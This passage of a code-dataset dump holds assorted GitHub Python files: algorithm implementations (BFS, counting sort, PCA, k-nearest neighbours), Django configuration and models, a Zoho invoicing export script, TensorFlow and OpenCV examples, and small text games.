i, param in params:\n param_type = param.annotation.__name__\n\n type_name_mapping = {\n \"str\": \"string\",\n \"int\": \"integer\",\n \"float\": \"number\",\n \"bool\": \"boolean\",\n \"list\": \"array\",\n \"dict\": \"object\",\n }\n\n if param_type in type_name_mapping:\n param_type = type_name_mapping[param_type]\n\n parameters['properties'][param.name] = {\n \"type\": param_type,\n \"description\": args_doc[param.name],\n }\n\n # add schema for array\n if param_type == \"array\":\n # extract type of array, the int of list[int]\n # use re\n array_type_tuple = re.findall(r'list\\[(\\w+)\\]', str(param.annotation))\n\n array_type = 'string'\n\n if len(array_type_tuple) > 0:\n array_type = array_type_tuple[0]\n\n if array_type in type_name_mapping:\n array_type = type_name_mapping[array_type]\n\n parameters['properties'][param.name][\"items\"] = {\n \"type\": array_type,\n }\n\n if param.default is inspect.Parameter.empty:\n parameters[\"required\"].append(param.name)\n\n return {\n \"function\": function,\n \"description\": desc,\n \"parameters\": parameters,\n }\n\n\nclass Namespace:\n \"\"\"\n Namespace is a virtual container for functions, generated automatically by CallingGPT\n with user provided modules.\n \"\"\"\n\n modules: list = []\n \n functions: dict = {}\n \"\"\"Store functions with structure as follows:\n {\n \"module_name_a\": {\n \"function_name_a\": {\n \"function\": function_a,\n \"description\": \"function_a description\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"parameter_a\": {\n \"type\": \"str\",\n \"description\": \"parameter_a description\"\n },\n \"parameter_b\": {\n \"type\": \"int\",\n \"description\": \"parameter_b description\"\n },\n \"parameter_c\": {\n \"type\": \"str\",\n \"description\": \"parameter_c description\",\n \"enum\": [\"a\", \"b\", \"c\"]\n },\n },\n \"required\": [\"parameter_a\", \"parameter_b\"]\n }\n },\n }\n }\n\n \"\"\"\n\n def _retrieve_functions(self):\n self.functions = {}\n for module in self.modules:\n # assert module is a module\n assert isinstance(module, type(sys))\n # ignore non-function attributes\n if not hasattr(module, '__functions__'):\n functions = {k: v for k, v in module.__dict__.items() if callable(v)}\n # ignore private functions\n functions = {k: v for k, v in functions.items() if not k.startswith('_')}\n else:\n functions = {v.__name__: v for v in module.__functions__ }\n\n self.functions[module.__name__.replace(\".\",\"-\")] = {}\n\n for name, function in functions.items():\n funtion_dict = get_func_schema(function)\n\n self.functions[module.__name__.replace(\".\",\"-\")][name] = funtion_dict\n\n def __init__(self, modules: list):\n self.modules = modules\n self._retrieve_functions()\n\n @property\n def functions_list(self):\n result: list = []\n for module_name, module in self.functions.items():\n for function_name, function in module.items():\n func = function.copy()\n func[\"name\"] = \"{}-{}\".format(module_name, function_name)\n del func[\"function\"]\n result.append(func)\n\n return result\n \n def call_function(self, function_name: str, args: dict):\n \"\"\"\n Call a function by name.\n \"\"\"\n result = {}\n\n # split the function name\n fn_spt = function_name.split('-')\n module_name = '-'.join(fn_spt[:-1])\n function_name = fn_spt[-1]\n\n # get the function\n function = self.functions[module_name][function_name]['function']\n\n # call the function\n result = function(**args)\n\n return result\n \n def add_function(self, module_name: str, function: callable):\n \"\"\"\n Add a function to namespace.\n \"\"\"\n # assert isinstance(function, callable)\n if module_name not in self.functions:\n self.functions[module_name] = {}\n self.functions[module_name][function.__name__] = get_func_schema(function)\n\n def add_modules(self, modules: list):\n \"\"\"\n Add a module to namespace.\n \"\"\"\n self.modules.extend(modules)\n self._retrieve_functions()\n ","repo_name":"RockChinQ/CallingGPT","sub_path":"src/CallingGPT/entities/namespace.py","file_name":"namespace.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"86"} +{"seq_id":"5657629131","text":"from queue import Queue\nfrom example_unweighted_graphs import UNDIRECTED_3\nfrom graph_helpers import (\n InitializeSSSP,\n GetVertices,\n ConstructPath,\n Vertex,\n UnweightedGraph,\n)\n\n\ndef bfsSSSP(G: UnweightedGraph, start: Vertex):\n # Notice that @param G is unweighted\n dist, prev = InitializeSSSP(G, start)\n queue: Queue[Vertex] = Queue()\n queue.put(start)\n\n while not queue.empty():\n u = queue.get()\n for adjacent_vertex in G[u]:\n # if the edge is tense\n # - weight is 1 for unweighted graphs\n if dist[u] + 1 < dist[adjacent_vertex]:\n # RelaxEdge()\n dist[adjacent_vertex] = dist[u] + 1\n prev[adjacent_vertex] = u\n queue.put(adjacent_vertex)\n\n return dist, prev\n\n\nif __name__ == \"__main__\":\n start: Vertex = \"S\"\n dist, prev = bfsSSSP(UNDIRECTED_3, start)\n print(f\"dist:{dist}\\nprev:{prev}\\n======\")\n\n for vertex in GetVertices(UNDIRECTED_3):\n if vertex != start:\n print(\n f\"Shortest Path from {start} to {vertex} is {ConstructPath(prev, vertex)}\"\n )\n","repo_name":"tomli380576/ECS122A-Algorithms-python-implementation","sub_path":"Implementations/SSSP-BFS.py","file_name":"SSSP-BFS.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"40343799097","text":"from django.conf import settings\n#from django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.urls import include, path\nfrom django.views import defaults as default_views\nfrom movie.views import HomeView\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\nfrom tasks.views import (\n load_data_view,\n load_data1_view,\n load_data2_view,\n load_data3_view,\n)\n\nfrom config.settings.base import env\n\nfrom django.urls import re_path\n\nurlpatterns = [\n path('summernote/', include('django_summernote.urls')),\n path(\"\", HomeView.as_view(), name=\"home\"),\n path(\"load-data/\", load_data_view, name=\"load-data\"),\n path(\"load-data-1/\", load_data1_view, name=\"load-data-1\"),\n path(\"load-data-2/\", load_data2_view, name=\"load-data-2\"),\n path(\"load-data-3/\", load_data3_view, name=\"load-data-3\"),\n # Django Admin, use {% url 'admin:index' %}\n path(settings.ADMIN_URL, admin.site.urls),\n # User management\n path(\"users/\", include(\"cinema.users.urls\", namespace=\"users\")),\n path(\"accounts/\", include(\"allauth.urls\")),\n re_path('^searchableselect/', include('searchableselect.urls')),\n path(\"\", include(\"movie.site_urls\")),\n path(\"\", include(\"offer.site_urls\")),\n path(\"\", include(\"music.site_urls\")),\n path(\"\", include(\"game.site_urls\")),\n path(\"\", include(\"serial.site_urls\")),\n path(\"\", include((\"tasks.urls\", \"tasks\"), namespace=\"tasks\"))\n # Your stuff: custom urls includes go here\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nif settings.DEBUG:\n # Static file serving when using Gunicorn + Uvicorn for local web socket development\n urlpatterns += staticfiles_urlpatterns()\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Cinema API\",\n default_version=env(\"HEROKU_RELEASE_VERSION\", default=\"v1\"),\n description=\"Cinema API\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"info@byt.bz\"),\n license=openapi.License(name=\"MIT License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\n\n# API URLS\nurlpatterns += [\n # API base url\n path(\"api/\", include(\"config.api_router\")),\n # DRF auth token\n path(\"api/token/\", TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"api/token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n path(\"api/token/verify/\", TokenVerifyView.as_view(), name=\"token_verify\"),\n re_path(\n r\"^swagger(?P\\.json|\\.yaml)$\",\n schema_view.without_ui(cache_timeout=0),\n name=\"schema-json\",\n ),\n re_path(\n r\"^swagger/$\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema-swagger-ui\",\n ),\n re_path(\n r\"^redoc/$\", schema_view.with_ui(\"redoc\", cache_timeout=0), name=\"schema-redoc\"\n ),\n]\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n path(\n \"400/\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ),\n path(\n \"403/\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n path(\n \"404/\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n path(\"500/\", default_views.server_error),\n ]\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns = [path(\"__debug__/\", include(debug_toolbar.urls))] + urlpatterns\n","repo_name":"BigCatalyst/VisualesManagement","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74467577565","text":"# counting sort: does not use any comparison operation. Can be within linear time complexity.\n\n# Theorem: any sorting algorithm that uses comparison has minimum time complexity O(n*lg(n)).\n# (can be proven by the decision tree model)\n\n# For an array A of n elements in a range of width k, counting sort has time complexity O(n+k), \n# which can be reduced to O(n) if k is not much larger than n.\n\ndef counting_sort(A):\n \"\"\"\n @brief sort an array in ascending order.\n @params A: array of numbers\n @retval B: array of sorted numbers in A\n \"\"\"\n n = len(A)\n assert (min(A) >= 0)\n k = max(A)\n\n # initialize two arrays B and C\n B = [0 for _ in range(n)] # B is the output array\n C = [0 for _ in range(k+1)] # C[i] is the number of occurence of i in A\n\n # for num in A, count occurence and record in C[num]\n for i in range(n):\n C[A[i]] = C[A[i]] + 1\n \n # C[i] now contains the number of elements equal to i.\n # Now make C[i] contain the number of elements less than or equal to i.\n for i in range(1, k+1):\n C[i] = C[i] + C[i-1]\n \n # put each element in the right place by referring to C\n for i in range(n):\n B[C[A[i]] - 1] = A[i]\n C[A[i]] -= 1 # in case of duplicate elements\n \n return B\n\ndef test():\n test_A = [7, 8, 10, 22, 45, 1, 0, 22, 2, 2, 1, 7, 8]\n if (sorted(test_A) == counting_sort(test_A)):\n print(\"counting_sort succeeded.\")\n print(\"before sorted: \", test_A)\n print(\"after sorted: \", counting_sort(test_A))\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"yumiweidemao/py","sub_path":"intro2algorithms/2_sorting/countingsort.py","file_name":"countingsort.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41620922386","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\n\nfrom django.contrib.auth.models import User\n\n\nclass Blog(models.Model):\n def __unicode__(self):\n return self.name\n\n user = models.ForeignKey(\n User,\n )\n\n name = models.CharField(\n u\"ブログ名\",\n max_length=256\n )\n\n description = models.TextField(\n u\"説明\",\n max_length=1024,\n blank=True\n )\n\n header = models.TextField(\n u\"ヘッダー\",\n max_length=1024,\n blank=True\n )\n\n footer = models.TextField(\n u\"フッター\",\n max_length=1024,\n blank=True\n )\n\n created_at = models.DateTimeField(\n u\"作成日時\",\n auto_now_add=True\n )\n\n updated_at = models.DateTimeField(\n u\"更新日時\",\n auto_now=True\n )\n\n class Meta:\n ordering = ['-updated_at']\n verbose_name = u'ブログ'\n verbose_name_plural = u'ブログ'\n\n\nclass Post(models.Model):\n def __unicode__(self):\n return self.title\n\n blog = models.ForeignKey(\n Blog\n )\n\n title = models.CharField(\n u\"タイトル\",\n max_length=255,\n )\n\n contents = models.TextField(\n u\"コンテンツ\",\n )\n\n created_at = models.DateTimeField(\n u\"作成日時\",\n auto_now_add=True\n )\n\n updated_at = models.DateTimeField(\n u\"更新日時\",\n auto_now=True\n )\n\n class Meta:\n ordering = ['-updated_at']\n verbose_name = u'投稿'\n verbose_name_plural = u'投稿'","repo_name":"masaki-sato/django-sample","sub_path":"blog/cms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34916019434","text":"from zoho import *\nfrom openpyxl import Workbook\nfrom datetime import datetime\n\n\nexcel_header = [\"Date\", \"Order-Id\", \"Buyer Org Name\", \"Buyer Ph Num\", \"Buyer GSTIN\", \"Fulfill\", \"Order Line Id\", \"ListingId\", \"Product Id\", \"Product Title\",\"Is A Set\",\"Size of Set\",\"Hsn\",\"Cess %\",\"Gst %\",\"Total Units\",\"Unit Of Measurement\",\"Unit Price (Rs.) (Inclusive Taxes)\",\"Invoice Id\",\"No. of Boxes\",\"Total weight of Boxes (Kg)\",\"Order Notes\"]\n\ninvoice_api = zoho_books.get_invoices_api()\n\n\ndef get_invoice_by_number(invoice_number):\n invoice = invoice_api.get_invoices({'invoice_number': invoice_number}).get_invoices()[0]\n invoice_details = invoice_api.get(invoice.invoice_id)\n return invoice_details\n\n\ndef get_custom_field_value(invoice, field_name, defaultValue=None):\n fields = invoice.get_custom_fields()\n for field in fields:\n if field.get_label() == field_name:\n return field.get_value()\n return defaultValue\n\n\ndef generate_file(invoice_number, output_path='shipping_label.xlsx'):\n book = Workbook()\n sheet = book.active\n sheet.append(excel_header)\n print(\"Looking for Invoice Number: {}\".format(invoice_number))\n invoice = get_invoice_by_number(invoice_number)\n first = True\n for line_item in invoice.line_items:\n row = []\n row.append(datetime.strptime(invoice.get_date(), '%Y-%m-%d').strftime('%d-%b-%Y 10:00'))\n row.append(get_custom_field_value(invoice, 'Udaan Order ID', ''))\n row.append(invoice.get_customer_name())\n row.append('+91-{}'.format(invoice.get_contact_persons()[0]['mobile']))\n row.append(invoice.gst_no)\n row.append('Yes')\n item_id = 'TLHKP{0}{0}'.format(line_item.line_item_id)[:31]\n row.append(item_id)\n row.append(item_id)\n row.append(item_id)\n row.append(line_item.name)\n row.append('No')\n row.append('NA')\n row.append(line_item.get_hsn_or_sac())\n row.append(0)\n row.append(line_item.tax_percentage)\n row.append(line_item.quantity)\n row.append('Pieces')\n if str(line_item.discount).endswith('%'):\n discount_percent = float(line_item.discount[:-1])\n else:\n discount_percent = float(line_item.discount)\n discounted_rate = round((line_item.rate * (100 - discount_percent) / 100.0), 2)\n row.append(round(discounted_rate * (100 + line_item.tax_percentage) / 100.0, 2))\n row.append(invoice.invoice_number[3:])\n if first:\n first = False\n row.append(get_custom_field_value(invoice, 'No of Boxes', 1))\n row.append(get_custom_field_value(invoice, 'Total Weight', 5))\n sheet.append(row)\n book.save(home/output_path)\n return output_path\n\n\ndef generate_files(invoice_number):\n file_path_format = 'invoice_file_{}.xlsx'\n output_file = generate_file(invoice_number, file_path_format.format(invoice_number))\n return output_file\n","repo_name":"deepubansal/udaan-zoho-integration","sub_path":"zoho/invoicing/generate_rts_file.py","file_name":"generate_rts_file.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25466000960","text":"import random\n\ndef is_valid(str: str,max:int)->bool:\n if str.isdigit():\n if 1<=int(str)<=100:\n return True\n return False\n\nnum=random.randint(1,100)\nprint('Добро пожаловать в числовую угадайку')\nprint ('Введите правую границу:')\nmax=0\nwhile True:\n max=input()\n if max.isdigit():\n max=int(max)\n if max>1:\n break\n\nprint ('Введите число:')\ncount_try=0\nwhile True:\n count_try +=1\n while True:\n num_str=input()\n if is_valid(num_str,max):\n num_user=int(num_str)\n break\n else:\n print(f'А может быть все-таки введем целое число от 1 до {max}?')\n if num_user==num:\n print (f'Вы угадали, поздравляем! (попыток:{count_try})')\n print ('Сыграем еще?(y/n)')\n answer_user=''\n while answer_user not in ['y','n']:\n answer_user=input()\n if answer_user=='n':\n break\n else:\n num = random.randint(1, 100)\n print('Введите число:')\n count_try = 0\n elif num>num_user:\n print('Ваше число меньше загаданного, попробуйте еще')\n else:\n print('Ваше число больше загаданного, попробуйте еще')\nprint('Спасибо, что играли в числовую угадайку. Еще увидимся...')","repo_name":"Tituchenko/StepikPython","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4208101049","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2\n\n\n#data:1行为一个特征,1列为一个样本\ndef PCA(data,k): #代表被压缩到k维\n mean_data = np.mean(data,axis=0) #被压缩到1行\n mean_removed = data - mean_data #去均值\n cov_mean_removed = np.cov(mean_removed)\n eigvals,eigvects = np.linalg.eig(cov_mean_removed) #特征值和特征向量\n eigvals_Loc = np.argsort(eigvals)\n eigvals_Loc_max_k = eigvals_Loc[:-(k+1):-1] #返回k个最大特征值下标\n eigvects_max_k = eigvects[:,eigvals_Loc_max_k] #返回k个最大特征值对应的特征向量\n lower_data = np.dot(eigvects_max_k.T,mean_removed) #降维后的数据集\n re_data = np.dot(eigvects_max_k,lower_data)+mean_data #重构原data\n return lower_data,re_data\n\n#二维绘图\ndef draw0(data):\n rows, cols = data.shape\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for i in range(cols):\n ax.scatter(data[0,i],data[1,i],color='red')\n ax.set_title('2D')\n plt.show()\n return\n\n#三维绘图\ndef draw1(data):\n rows, cols = data.shape\n fig = plt.figure()\n ax = Axes3D(fig)\n for i in range(cols):\n ax.scatter(data[0,i],data[1,i],data[2,i],color='red')\n ax.set_xlabel('X Label')\n ax.set_ylabel('Y Label')\n ax.set_zlabel('Z Label')\n ax.set_title('3D')\n plt.show()\n return\n\n#计算峰值信噪比PSNR\ndef cal_PSNR(data1,data2):\n raws = data1.shape[0]\n cols = data1.shape[1]\n noise = data2 - data1\n sum = 0\n for i in range(raws):\n for j in range(cols):\n sum += np.abs(noise[i][j])\n MSE = sum/(raws*cols)\n PSNR = 20 * np.log10(255/np.sqrt(MSE))\n return np.round(PSNR,2)\n\n# #计算PSNR\n# def cal_psnr(img1, img2):\n# mse = np.mean((img1 / 255. - img2 / 255.) ** 2)\n# if mse < 1.0e-10:\n# return 100\n# PIXEL_MAX = 1\n# return 20 * math.log10(PIXEL_MAX / math.sqrt(mse))\n\n#自己生成数据进行降维测试\ndef my_PCA():\n mean = (5, 1, 10)\n cov = [[5, 0, 0], [0, 0.01, 0], [0, 0, 6]]\n size = 100\n np.random.seed(0)\n data = np.random.multivariate_normal(mean, cov, size)\n data = data.T\n draw1(data)\n lower_data, re_data = PCA(data, 2) # 三维降到二维\n draw0(lower_data)\n return\n\ndef photo_PCA():\n k = 1\n pra = 1 #图片缩放比例\n\n img = cv2.imread('1.JPG')\n # img = cv2.imread('2.JPG')\n # img = cv2.imread('3.JPG')\n rows = img.shape[0]\n cols = img.shape[1]\n img_resize = cv2.resize(img,(int(pra*cols),int(pra*rows))) #经测试,cols和rows的顺序应该是这样,缩放图片\n img_gray = cv2.cvtColor(img_resize,cv2.COLOR_BGR2GRAY) #转换为单通道灰度图\n print(img_gray.shape[0],img_gray.shape[1])\n # cv2.imshow(\"Original\", img_gray)\n # cv2.waitKey(0)\n plt.imshow(img_gray, cmap='gray')\n plt.title('Original')\n plt.show()\n\n Rows = img_gray.shape[0]\n Cols = img_gray.shape[1]\n data = img_gray\n print(data) #打印原灰度图片矩阵\n\n lower_data,re_data = PCA(data,k)\n re_data = np.real(re_data)\n\n #只能取整数,但仍为float64型\n for i in range(Rows):\n for j in range(Cols):\n re_data[i][j] = int(re_data[i][j])\n #特殊方法转换\n re_data = re_data.astype(int)\n print(re_data)\n\n PSNR = cal_PSNR(data, re_data)\n print()\n print(\"信噪比:\", PSNR)\n\n plt.imshow(re_data,cmap='gray')\n plt.title(\"k={},PSNR={}\".format(str(k),str(PSNR)))\n plt.show()\n #调cv库有问题\n # cv2.imshow(\"Restored\", re_data)\n # cv2.waitKey(0)\n\n return\n\n\n# my_PCA() #我写的是3维-2维\nphoto_PCA()","repo_name":"Yuuhooow/HIT-ML_Labs-2020","sub_path":"Lab4_PCA/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"38388408627","text":"from typing import Optional, Tuple\n\nimport torch\n\nfrom torchvision.transforms import (\n Normalize,\n Compose,\n InterpolationMode,\n Resize,\n CenterCrop,\n)\n\nfrom open_clip.constants import OPENAI_DATASET_MEAN, OPENAI_DATASET_STD\n\n\ndef image_transform(\n image_size: int,\n mean: Optional[Tuple[float, ...]] = None,\n std: Optional[Tuple[float, ...]] = None,\n):\n mean = mean or OPENAI_DATASET_MEAN\n if not isinstance(mean, (list, tuple)):\n mean = (mean,) * 3\n\n std = std or OPENAI_DATASET_STD\n if not isinstance(std, (list, tuple)):\n std = (std,) * 3\n\n if isinstance(image_size, (list, tuple)) and image_size[0] == image_size[1]:\n # for square size, pass size as int so that\n # Resize() uses aspect preserving shortest edge\n image_size = image_size[0]\n\n normalize = Normalize(mean=mean, std=std)\n\n def convert_from_uint8_to_float(image: torch.Tensor) -> torch.Tensor:\n if image.dtype == torch.uint8:\n return image.to(torch.float32) / 255.0\n else:\n return image\n\n return Compose(\n [\n convert_from_uint8_to_float,\n Resize((image_size, image_size), interpolation=InterpolationMode.BICUBIC),\n CenterCrop(image_size),\n normalize,\n ]\n )\n","repo_name":"AlignmentResearch/vlmrm","sub_path":"src/vlmrm/contrib/open_clip/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"86"} +{"seq_id":"72591309404","text":"# 1160. Find Words That Can Be Formed by Characters\n\nfrom collections import Counter\n\n\ndef countCharacters(words, chars):\n len_good_str = 0\n chars_counter = Counter(chars)\n for word in words:\n good_str = True\n word_counter = Counter(list(word))\n for key in word_counter.keys():\n if key not in chars_counter:\n good_str = False\n break\n else:\n if chars_counter[key] < word_counter[key]:\n good_str = False\n break\n if good_str:\n len_good_str += len(word)\n\n return len_good_str\n\n\nwords = [\"hello\", \"world\", \"leetcode\"] # [\"cat\", \"bt\", \"hat\", \"tree\"]\nchars = \"welldonehoneyr\" # \"atach\"\nprint(countCharacters(words=words, chars=chars))\n","repo_name":"HaykSahakyan11/Machine_Learning_2","sub_path":"practical_5/Find Words That Can Be Formed by Characters.py","file_name":"Find Words That Can Be Formed by Characters.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1294112938","text":"import tensorflow as tf\n\n# 当命名空间reuse为默认(False)时,get_variable和Variable效果一样\nv = tf.get_variable(\"v\", shape=[1], initializer=tf.constant_initializer(1.0))\n\n# with tf.Session() as sess:\n# init_op = tf.global_variables_initializer()\n# sess.run(init_op)\n# print(sess.run(v)) # 输出[1.]\n# print(v) # 输出,表明是在空的命名空间中生成的变量\n#\n# with tf.variable_scope(\"foo\"):\n# v = tf.get_variable(\"v\", [1], initializer=tf.constant_initializer(1.0))\n# print(v) # 输出,表明是在foo的命名空间中生成的变量\n#\n# with tf.variable_scope(\"foo\", reuse=True): # 使用reuse时,使用get_variable()会直接获取相应的变量,如果没有会直接报错\n# v1 = tf.get_variable(\"v\", [1])\n# print(v1 == v)\n\nprint(\"---------------------------------------------------\")\nprint(v.name)\n# 嵌套使用命名空间\nwith tf.variable_scope(\"root\"):\n print(tf.get_variable_scope().reuse) # False\n v2 = tf.get_variable(\"v\", [1])\n print(v2.name)\n with tf.variable_scope(\"foo\", reuse=True): # True\n print(tf.get_variable_scope().reuse)\n\n with tf.variable_scope(\"bar\"): # False\n print(tf.get_variable_scope().reuse)\n\n print(tf.get_variable_scope().reuse) # False\n\n\n# 对tensorflow_train_network中inference函数的改进,让它可以接受更少的参数\ndef inference(input_tensor, reuse=False):\n with tf.variable_scope(\"layer1\", reuse=reuse):\n weights = tf.get_variable(\"weights\")\n biases = tf.get_variable(\"biases\")\n layer1 = tf.nn.relu(tf.matmul(input_tensor, weights) + biases)\n return layer1\n","repo_name":"hxz1998/deeplearning_learning","sub_path":"chapter-5/variable_management.py","file_name":"variable_management.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32790494300","text":"import os\nimport cv2\nfrom os.path import join\nfrom train_validation_test_split import make_dirs\n\ndef edgeDetection(directory):\n # directory 에 해당하는 파일들을 files로 전부 불러옴\n # files = os.listdir(directory)\n files = [f for f in os.listdir(directory) if os.path.isfile(join(directory, f))]\n for name in files:\n path = join(directory, name) # dataset/whole/[name]\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n # Sobel 필터 적용\n sobelx = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=3)\n sobely = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=3)\n sobelxy = sobelx + sobely\n cv2.imwrite(join(directory, 'edge_detection_SobelX', name) , sobelx)\n cv2.imwrite(join(directory, 'edge_detection_SobelY', name) , sobely)\n cv2.imwrite(join(directory, 'edge_detection_SobelXY', name) , sobelxy)\n\n # Scharr 필터 적용\n scharrx = cv2.Scharr(img, cv2.CV_64F, 0, 1)\n scharry = cv2.Scharr(img, cv2.CV_64F, 0, 1)\n scharrxy = scharrx + scharry\n cv2.imwrite(join(directory, 'edge_detection_ScharrX', name) , scharrx)\n cv2.imwrite(join(directory, 'edge_detection_ScharrY', name) , scharry)\n cv2.imwrite(join(directory, 'edge_detection_ScharrXY', name) , scharrxy)\n\n laplacian = cv2.Laplacian(img, cv2.CV_64F)\n cv2.imwrite(join(directory, 'edge_detection_Laplacian', name) , laplacian)\n # Canny 필터 적용\n # 두 번째 인자가 일정 임계값 보다 낮으면 엣��로 추출 x, 세 번째 인자는 일정 임계값보다 높으면 무조건 엣지로 추출\n # cannyxy = cv2.Canny(img, 50, 115)\n # cv2.imwrite(join(directory, 'edge_detection_Canny2', name) , cannyxy)\n\npath = 'dataset/whole'\nmake_dirs(path, 'edge_detection_SobelX')\nmake_dirs(path, 'edge_detection_SobelY')\nmake_dirs(path, 'edge_detection_SobelXY')\n\nmake_dirs(path, 'edge_detection_ScharrX')\nmake_dirs(path, 'edge_detection_ScharrY')\nmake_dirs(path, 'edge_detection_ScharrXY')\n\nmake_dirs(path, 'edge_detection_Laplacian')\n# make_dirs(path, 'edge_detection_Canny2')\n\nedgeDetection(path)","repo_name":"skatld123/Diamond_Wire_Classification","sub_path":"edge_detection.py","file_name":"edge_detection.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7395729531","text":"import numpy as np\n\n\"\"\"This is an implementation of the k nearest neighbors algorithm for a classification task\n\n Parameters:\n train_data - numeric pandas data frame of training data\n targets - numpy array, pandas series, or pandas dataframe\n test_data - numeric pandas data frame of testing data\n k - number of nearest neighbors to consider\n\n output:\n pandas dataframe of class predictions\n\"\"\"\n__author__ = \"Femi\"\n__version__ = \"1\"\n__status__ = \"Developing\"\n\nclass knn:\n\n\n def __init__(self,train_data,targets,k,test_data):\n self.data = train_data.copy()\n self.targets = targets.copy()\n self.k = k\n self.assigned_class = []\n self.test_data = test_data.copy()\n\n\n def find_distance(self,point_1):\n distance = np.linalg.norm(self.test_data.loc[point_1] - self.data, ord = 2, axis =1)\n return distance\n\n def find_nearest_neighbors(self,distances):\n ### Flatten distances so argmin corresponds to precise index location\n distances = distances.flatten()\n count = 0\n class_votes = []\n while count < self.k:\n min_point = np.argmin(distances)\n distances = np.delete(distances, min_point)\n ## Record votes\n class_votes.append(self.targets.loc[min_point])\n count+=1\n self.assigned_class.append(pd.Series(class_votes).value_counts().index[0])\n\n def predict(self):\n for point_1 in self.test_data.index:\n distance = self.find_distance(point_1)\n self.find_nearest_neighbors(distance)\n return pd.DataFrame(self.assigned_class)\n","repo_name":"oojo12/ml-algorithms","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71977547805","text":"#!/usr/bin/env python\n\n# ale_python_test1.py\n# Author: Ben Goodrich\n#\n# This is a direct port to python of the shared library example from ALE provided in\n# doc/examples/sharedLibraryInterfaceExample.cpp\n\nimport sys\nfrom ale_python_interface import ALEInterface\nimport numpy as np\n\nif(len(sys.argv) < 2):\n print(\"Usage ./ale_python_test1.py \")\n sys.exit()\n\nale = ALEInterface()\n\nmax_frames_per_episode = ale.getInt(\"max_num_frames_per_episode\");\nale.set(\"random_seed\",123)\n\nrandom_seed = ale.getInt(\"random_seed\")\nprint(\"random_seed: \" + str(random_seed))\n\nale.loadROM(sys.argv[1])\nlegal_actions = ale.getLegalActionSet()\n\nfor episode in range(10):\n total_reward = 0.0 \n while not ale.game_over():\n a = legal_actions[np.random.randint(legal_actions.size)]\n reward = ale.act(a);\n total_reward += reward\n print(\"Episode \" + str(episode) + \" ended with score: \" + str(total_reward))\n ale.reset_game()\n\n","repo_name":"bbitmaster/ale_python_interface","sub_path":"examples/ale_python_test1.py","file_name":"ale_python_test1.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"86"} +{"seq_id":"36525623972","text":"\"\"\"\nEste es un simple juego de texto para mostrar el uso de funciones.\nEl juego se llama \"BolaDeBarro\", donde los jugadores, por turnos, se\nlanzan bolas de barro unos contra otros, hasta que alguien es alcanzado.\n\"\"\"\n \nimport math\nimport random\n \ndef imprimir_instrucciones():\n \"\"\" Esta función imprimirá las instrucciones. \"\"\"\n \n # En una declaración print, puedes usar comillas triples para\n # imprimir varias líneas.\n print(\"\"\"\nBienvenido a Bolas de 